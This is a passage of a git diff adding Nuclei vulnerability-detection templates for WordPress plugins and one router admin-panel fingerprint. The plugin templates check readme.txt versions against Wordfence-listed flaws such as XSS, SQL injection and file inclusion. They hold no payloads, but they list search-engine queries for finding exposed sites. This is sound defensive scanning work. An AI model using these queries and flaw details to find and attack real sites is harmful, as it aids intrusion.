CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12026 + metadata: + fofa-query: "wp-content/plugins/cf7-message-filter/" + google-query: inurl:"/wp-content/plugins/cf7-message-filter/" + shodan-query: 'vuln:CVE-2024-12026' + tags: cve,wordpress,wp-plugin,cf7-message-filter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-message-filter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12115.yaml b/poc/cve/CVE-2024-12115.yaml new file mode 100644 index 0000000000..c7683d9676 --- /dev/null +++ b/poc/cve/CVE-2024-12115.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12115 + +info: + name: > + Poll Maker <= 5.5.4 - Cross-Site Request Forgery to Poll Duplication + author: topscoder + severity: medium + description: > + The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.4. This is due to missing or incorrect nonce validation on the duplicate_poll() function. This makes it possible for unauthenticated attackers to duplicate polls via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e76447ec-2815-4758-ae2c-67a938a739d9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12115 + metadata: + fofa-query: "wp-content/plugins/poll-maker/" + google-query: inurl:"/wp-content/plugins/poll-maker/" + shodan-query: 'vuln:CVE-2024-12115' + tags: cve,wordpress,wp-plugin,poll-maker,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/poll-maker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "poll-maker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12128.yaml b/poc/cve/CVE-2024-12128.yaml new file mode 100644 index 0000000000..dd79fd402c --- /dev/null +++ b/poc/cve/CVE-2024-12128.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12128 + +info: + name: > + Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal <= 3.1.2 - Reflected Cross-Site Scripting via monthly_sales_current_year Parameter + author: topscoder + severity: medium + description: > + The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘monthly_sales_current_year’ parameter in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c7d688af-649c-4858-9c63-b12933d78bc2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12128 + metadata: + fofa-query: "wp-content/plugins/simple-e-commerce-shopping-cart/" + google-query: inurl:"/wp-content/plugins/simple-e-commerce-shopping-cart/" + shodan-query: 'vuln:CVE-2024-12128' + tags: cve,wordpress,wp-plugin,simple-e-commerce-shopping-cart,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-e-commerce-shopping-cart/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-e-commerce-shopping-cart" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12165.yaml b/poc/cve/CVE-2024-12165.yaml new file mode 100644 index 0000000000..4cfac374b3 --- /dev/null +++ b/poc/cve/CVE-2024-12165.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12165 + +info: + name: > + Mollie for Contact Form 7 <= 5.0.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Mollie for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12165 + metadata: + fofa-query: "wp-content/plugins/cf7-mollie/" + google-query: inurl:"/wp-content/plugins/cf7-mollie/" + shodan-query: 'vuln:CVE-2024-12165' + tags: cve,wordpress,wp-plugin,cf7-mollie,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-mollie/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-mollie" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12166.yaml b/poc/cve/CVE-2024-12166.yaml new file mode 100644 index 0000000000..7aefefe9e4 --- /dev/null +++ b/poc/cve/CVE-2024-12166.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12166 + +info: + name: > + Shortcodes Blocks Creator Ultimate <= 2.2.0 - Reflected Cross-Site Scripting via 'page' + author: topscoder + severity: medium + description: > + The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ece9b6d-6802-44b9-9ead-1563286f4ff3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12166 + metadata: + fofa-query: "wp-content/plugins/ultimate-shortcodes-creator/" + google-query: inurl:"/wp-content/plugins/ultimate-shortcodes-creator/" + shodan-query: 'vuln:CVE-2024-12166' + tags: cve,wordpress,wp-plugin,ultimate-shortcodes-creator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-shortcodes-creator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-shortcodes-creator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12167.yaml b/poc/cve/CVE-2024-12167.yaml new file mode 100644 index 0000000000..ec79badc40 --- /dev/null +++ b/poc/cve/CVE-2024-12167.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12167 + +info: + name: > + Shortcodes Blocks Creator Ultimate <= 2.2.0 - Reflected Cross-Site Scripting via _wpnonce + author: topscoder + severity: medium + description: > + The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db6ccadb-5e90-4234-88cc-28241846acea?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12167 + metadata: + fofa-query: "wp-content/plugins/ultimate-shortcodes-creator/" + google-query: inurl:"/wp-content/plugins/ultimate-shortcodes-creator/" + shodan-query: 'vuln:CVE-2024-12167' + tags: cve,wordpress,wp-plugin,ultimate-shortcodes-creator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-shortcodes-creator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-shortcodes-creator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml b/poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml new file mode 100644 index 0000000000..f2308a585c --- /dev/null +++ b/poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12209-6ec7c164fe320907f155f71f239635b3 + +info: + name: > + WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-12209 + metadata: + fofa-query: "wp-content/plugins/wp-health/" + google-query: inurl:"/wp-content/plugins/wp-health/" + shodan-query: 'vuln:CVE-2024-12209' + tags: cve,wordpress,wp-plugin,wp-health,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-health/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-health" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.17.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12253.yaml b/poc/cve/CVE-2024-12253.yaml new file mode 100644 index 0000000000..ac168ac90f --- /dev/null +++ b/poc/cve/CVE-2024-12253.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12253 + +info: + name: > + Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Settings Update / Data Access + author: topscoder + severity: low + description: > + The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'save_settings', 'export_csv', and 'simpleecommcart-action' actions in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the plugins settings and retrieve order and log data (which is also accessible to unauthenticated users). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c6a1956-73aa-4ac3-ae1c-ef5f62bad718?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12253 + metadata: + fofa-query: "wp-content/plugins/simple-e-commerce-shopping-cart/" + google-query: inurl:"/wp-content/plugins/simple-e-commerce-shopping-cart/" + shodan-query: 'vuln:CVE-2024-12253' + tags: cve,wordpress,wp-plugin,simple-e-commerce-shopping-cart,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-e-commerce-shopping-cart/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-e-commerce-shopping-cart" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12257.yaml b/poc/cve/CVE-2024-12257.yaml new file mode 100644 index 0000000000..91db656093 --- /dev/null +++ b/poc/cve/CVE-2024-12257.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12257 + +info: + name: > + CardGate Payments for WooCommerce <= 3.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The CardGate Payments for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f8de5a9-2279-4b84-b1f6-fdb293aa6017?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12257 + metadata: + fofa-query: "wp-content/plugins/cardgate/" + google-query: inurl:"/wp-content/plugins/cardgate/" + shodan-query: 'vuln:CVE-2024-12257' + tags: cve,wordpress,wp-plugin,cardgate,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cardgate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cardgate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12270.yaml b/poc/cve/CVE-2024-12270.yaml new file mode 100644 index 0000000000..e716d09498 --- /dev/null +++ b/poc/cve/CVE-2024-12270.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12270 + +info: + name: > + Beautiful Taxonomy Filters <= 2.4.3 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-12270 + metadata: + fofa-query: "wp-content/plugins/beautiful-taxonomy-filters/" + google-query: inurl:"/wp-content/plugins/beautiful-taxonomy-filters/" + shodan-query: 'vuln:CVE-2024-12270' + tags: cve,wordpress,wp-plugin,beautiful-taxonomy-filters,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beautiful-taxonomy-filters/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beautiful-taxonomy-filters" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7894.yaml b/poc/cve/CVE-2024-7894.yaml new file mode 100644 index 0000000000..15d2afcc62 --- /dev/null +++ b/poc/cve/CVE-2024-7894.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7894 + +info: + name: > + If Menu <= 0.19.1 - Missing Authorization to License Key Update + author: topscoder + severity: high + description: > + The If Menu plugin for WordPress is vulnerable to unauthorized modification of the plugin's license key due to a missing capability check on the 'actions' function in versions up to, and including, 0.19.1. This makes it possible for unauthenticated attackers to modify delete or modify the license key. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff6ebf45-4617-44dd-94d8-28aa8bc1609b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7894 + metadata: + fofa-query: "wp-content/plugins/if-menu/" + google-query: inurl:"/wp-content/plugins/if-menu/" + shodan-query: 'vuln:CVE-2024-7894' + tags: cve,wordpress,wp-plugin,if-menu,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/if-menu/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "if-menu" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.19.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8679.yaml b/poc/cve/CVE-2024-8679.yaml new file mode 100644 index 0000000000..fa30b89384 --- /dev/null +++ b/poc/cve/CVE-2024-8679.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8679 + +info: + name: > + Library Management System <= 3.0.0 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The Library Management System – Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the ‘value' parameter of the owt_lib_handler AJAX action in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cve-id: CVE-2024-8679 + metadata: + fofa-query: "wp-content/plugins/library-management-system/" + google-query: inurl:"/wp-content/plugins/library-management-system/" + shodan-query: 'vuln:CVE-2024-8679' + tags: cve,wordpress,wp-plugin,library-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/library-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "library-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0') \ No newline at end of file diff --git a/poc/other/beautiful-taxonomy-filters.yaml b/poc/other/beautiful-taxonomy-filters.yaml new file mode 100644 index 0000000000..9b124bb927 --- /dev/null +++ b/poc/other/beautiful-taxonomy-filters.yaml @@ -0,0 +1,59 @@ +id: beautiful-taxonomy-filters + +info: + name: > + Beautiful Taxonomy Filters <= 2.4.3 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/beautiful-taxonomy-filters/" + google-query: inurl:"/wp-content/plugins/beautiful-taxonomy-filters/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,beautiful-taxonomy-filters,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beautiful-taxonomy-filters/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beautiful-taxonomy-filters" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.3') \ No newline at end of file diff --git a/poc/other/cf7-mollie.yaml b/poc/other/cf7-mollie.yaml new file mode 100644 index 0000000000..204e4a17e7 --- /dev/null +++ b/poc/other/cf7-mollie.yaml @@ -0,0 +1,59 @@ +id: cf7-mollie + +info: + name: > + Mollie for Contact Form 7 <= 5.0.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cf7-mollie/" + google-query: inurl:"/wp-content/plugins/cf7-mollie/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cf7-mollie,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-mollie/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-mollie" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.0') \ No newline at end of file diff --git a/poc/other/clicksend-lead-capture-form.yaml b/poc/other/clicksend-lead-capture-form.yaml new file mode 100644 index 0000000000..24d74d522d --- /dev/null +++ b/poc/other/clicksend-lead-capture-form.yaml @@ -0,0 +1,59 @@ +id: clicksend-lead-capture-form + +info: + name: > + SMS for Lead Capture Forms <= 1.1.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Message Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c68bb6-77a2-4232-923a-37f2c0327743?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/clicksend-lead-capture-form/" + google-query: inurl:"/wp-content/plugins/clicksend-lead-capture-form/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,clicksend-lead-capture-form,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clicksend-lead-capture-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clicksend-lead-capture-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/other/comfino-payment-gateway.yaml b/poc/other/comfino-payment-gateway.yaml new file mode 100644 index 0000000000..2ce4fa49f1 --- /dev/null +++ b/poc/other/comfino-payment-gateway.yaml @@ -0,0 +1,59 @@ +id: comfino-payment-gateway + +info: + name: > + Comfino Payment Gateway <= 4.1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/006945a3-5f54-4bb8-9522-c832d59624a0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/comfino-payment-gateway/" + google-query: inurl:"/wp-content/plugins/comfino-payment-gateway/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,comfino-payment-gateway,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/comfino-payment-gateway/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "comfino-payment-gateway" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.1') \ No newline at end of file diff --git a/poc/other/edoc-easy-tables.yaml b/poc/other/edoc-easy-tables.yaml new file mode 100644 index 0000000000..545f44e7f8 --- /dev/null +++ b/poc/other/edoc-easy-tables.yaml @@ -0,0 +1,59 @@ +id: edoc-easy-tables + +info: + name: > + eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9d7d34-c03d-4791-94b4-9d2f502a7e37?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/edoc-easy-tables/" + google-query: inurl:"/wp-content/plugins/edoc-easy-tables/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,edoc-easy-tables,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/edoc-easy-tables/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "edoc-easy-tables" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.29') \ No newline at end of file diff --git a/poc/other/gl-ar300m_firmware.yaml b/poc/other/gl-ar300m_firmware.yaml new file mode 100644 index 0000000000..3d387bccf3 --- /dev/null +++ b/poc/other/gl-ar300m_firmware.yaml @@ -0,0 +1,20 @@ +id: gl-ar300m_firmware +info: + name: gl-ar300m_firmware + author: cn-kali-team + tags: detect,tech,gl-ar300m_firmware + severity: info + metadata: + product: gl-ar300m_firmware + shodan-query: + - title:"gl.inet admin panel" + vendor: gl-inet + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: regex + regex: + - (?mi)]*>gl.inet admin panel.*? diff --git a/poc/other/library-management-system.yaml b/poc/other/library-management-system.yaml new file mode 100644 index 0000000000..ea48142651 --- /dev/null +++ b/poc/other/library-management-system.yaml @@ -0,0 +1,59 @@ +id: library-management-system + +info: + name: > + Library Management System <= 3.0.0 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/library-management-system/" + google-query: inurl:"/wp-content/plugins/library-management-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,library-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/library-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + 